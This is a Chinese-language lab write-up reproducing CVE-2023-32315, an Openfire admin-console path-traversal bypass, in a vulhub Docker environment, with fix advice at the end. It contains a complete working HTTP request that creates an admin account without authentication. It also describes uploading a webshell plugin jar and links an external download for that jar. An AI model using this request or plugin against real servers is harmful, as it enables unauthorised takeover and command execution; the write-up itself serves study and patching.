CVE-2023-32315:Openfire管理控制台身份验证绕过到RCE的复现
CVE-2023-32315:Openfire管理控制台身份验证绕过到RCE复现
前言
本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!
一.Openfire简介
Openfire是根据开源Apache许可证授权的实时协作(RTC)服务器。它使用唯一广泛采用的即时消息开放协议XMPP(也称为Jabber)。
二.漏洞简述
在 4.7.4 和 4.6.7 之前的版本中,发现 Openfire 的管理控制台(管理控制台)是一个基于 Web 的应用程序,容易受到通过设置环境进行的路径遍历攻击。这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境来访问为管理用户保留的 Openfire 管理控制台中的受限页面。
三.漏洞原理
Openfire的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
四.影响版本
3.10.0 <= Openfire < 4.6.8
4.7.0 <= Openfire 4.7.x < 4.7.5
五.环境搭建
在kali的docker中搭建vulhub进行漏洞复现
clone项目:
sudo git clone https://github.com/vulhub/vulhub.git
在/openfire/CVE-2023-32315/目录,用下面的命令下载并启动:
sudo docker-compose up -d
搞定,查看环境:
sudo docker-compose ps
看到端口,这里是9090。
在浏览器上访问http://your-ip:9090
进入环境,说明配置成功了,接下来就可以开始愉快的漏洞复现了:
此时复现的Openfire版本为4.7.4
六.漏洞复现
十多年前,在 Openfire 管理控制台中发现了一个路径遍历问题 CVE-2008-6508。攻击者能够使用 /setup/setup-/…/…/[page].jsp 绕过身份验证检查并在不知道管理员用户名和密码的情况下访问 Arbitratry 页面。
从那时起,路径遍历保护已经到位,可以防止这种攻击。
嵌入式Web服务器的后期升级包括对UTF-16字符的非标准URL编码的支持。Openfire 中的路径遍历保护未更新为包括针对此新编码的保护。因此,攻击者能够使用 /setup/setup-/%u002e%u002e/%u002e%u002e/[page].jsp 以再次绕过路径遍历保护。
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
出现这种情况,证明漏洞存在
1.使用POC创建新的用户已经登录密码test/test
POC
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=test&name=&email=&password=test&passwordConfirm=test&isadmin=on&create=Create+User HTTP/1.1
Host: ip:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken
2.使用构造POC进行发包
然在响应中引发了异常,但创建了一个同时具有用户名和密码“test”的账户。
3.使用创建的账户进行登录
成功登录账户!!!
七.漏洞利用(命令执行)
根据创建的用户登录之后上传webshell,上传封装好的jar包,插件位置处上传jar包。
下载地址:
https://pan.baidu.com/s/1RHxoHb7DhgElOwOQGxGb1A
提取码:pezj
上传jar包,成功上传。
登录密码为123点击登录
命令执行成功,拿到webshell。
八.修复建议
1.升级版本至4.6.8或4.7.5及以上,目前厂商已升级了安全版本以修复这个安全问题,请到厂商的发布主页下载安全版本:
https://github.com/igniterealtime/Openfire/releases
2.制网络访问,切勿将 Openfire 管理控制台暴露于互联网,使用网络安全措施,确保只有受信任成员才能访问。
九.参考
https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm
https://vulhub.org/#/environments/openfire/CVE-2023-32315/